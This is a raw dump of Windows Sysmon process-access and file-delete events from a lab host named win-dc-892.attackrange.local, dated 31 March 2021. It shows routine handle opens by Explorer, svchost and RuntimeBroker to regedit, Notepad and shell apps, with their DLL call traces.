12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.235{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.235{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.391{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23117188151B8997D54DE4F0655252F0,SHA256=4488F038AD28D5B64DEEEAC8DA83038C2FAA5F3EDE9A2D1365D07F5EE90679B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.813{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 